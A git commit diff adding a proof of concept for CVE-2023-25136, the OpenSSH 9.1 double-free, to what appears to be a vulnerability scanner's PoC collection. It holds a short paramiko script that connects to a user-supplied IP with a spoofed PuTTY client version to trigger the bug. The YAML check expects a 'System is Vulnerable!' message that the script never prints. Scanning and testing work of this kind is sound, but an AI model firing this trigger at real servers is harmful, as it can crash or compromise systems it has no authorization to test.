feat: add CVE-2023-25136

2023-03-08 18:02:04 +08:00 · 2023-03-08 18:02:04 +08:00 · b5ebdbb3b9
parent 51837d57ab
commit b5ebdbb3b9
3 changed files with 70 additions and 1 deletions
--- a/data/SystemPocs/CVE-2023-25136/CVE-2023-25136.py
+++ b/data/SystemPocs/CVE-2023-25136/CVE-2023-25136.py
@ -0,0 +1,19 @@
+import paramiko
+import pyfiglet
+
+ascii_text = pyfiglet.figlet_format("openssh 9.1", font="starwars")                                                   
+ascii_text += "\n\033[38;2;255;153;51m\033[2m✨💥by christbowel🎭💻\033[0m"
+print(ascii_text)
+
+print ("")
+
+target_ip = input("Entrer l'adresse ip a exploiter: ")
+CLIENT_ID = "PuTTY_Release_0.64"
+
+def main():
+     transport = paramiko.Transport(target_ip)
+     transport.local_version = f"SSH-2.0-{CLIENT_ID}"
+     transport.connect(username='', password='')
+
+if __name__ == "__main__":
+     main()
--- a/data/SystemPocs/CVE-2023-25136/CVE-2023-25136.yaml
+++ b/data/SystemPocs/CVE-2023-25136/CVE-2023-25136.yaml
@ -0,0 +1,49 @@
+FormatVer: 20230203
+Id: CVE-2023-25136
+Belong: system
+PocHazardLevel: high
+Source: https://github.com/Christbowel/CVE-2023-25136
+SiteInfo:
+    Name: OpenSSH 服务double-free漏洞
+    Severity: critical
+    Description:
+        OpenSSH 服务(sshd) 9.1版本在options.kex_algorithms处理时存在double-free漏洞，攻击者在默认配置下可能触发此漏洞。由于现代内存分配器对double-free的保护缓解机制，该漏洞在真实场景中难以利用。
+    ScopeOfInfluence:
+        openssh 9.1
+        openssh(debian_12)
+        openssh(debian_sid)
+    References:
+        - http://www.openwall.com/lists/oss-security/2023/02/13/1
+        - https://bugzilla.mindrot.org/show_bug.cgi?id=3522
+    SiteClassification:
+        CvssMetrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+        CvssScore: 9.8
+        CveId: CVE-2023-25136
+        CweId: CWE-415
+        CnvdId: None
+        KveId: None
+    Tags:
+        - 双重释放
+        - OpenSSH
+SiteRequests:
+    Implement: 
+        ImArray:
+            - Inter : python3
+              InterArgs :
+              Exec : CVE-2023-25136.py
+              Args : 
+        ExpireTime:       #second
+
+        # < input
+        # > output 
+        # . wait
+        # ? condition
+        # : content
+        #
+        #组合起来
+        # >. 等待直到输出 
+        # << 输入字符
+        # >?判断条件
+        Inter:
+            - ">?:System is Vulnerable! Please fix asap" #ture
+        Condition: None
--- a/data/SystemPocs/SystemPocs.yaml
+++ b/data/SystemPocs/SystemPocs.yaml
@ -11,4 +11,5 @@ ExplorerItems:
    - ConfigFile: CVE-2021-3560/CVE-2021-3560.yaml
    - ConfigFile: CVE-2021-4043/CVE-2021-4043.yaml
    - ConfigFile: CVE-2021-3156/CVE-2021-3156.yaml
-    - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
+    - ConfigFile: CVE-2022-0351/CVE-2022-0351.yaml
+    - ConfigFile: CVE-2023-25136/CVE-2023-25136.yaml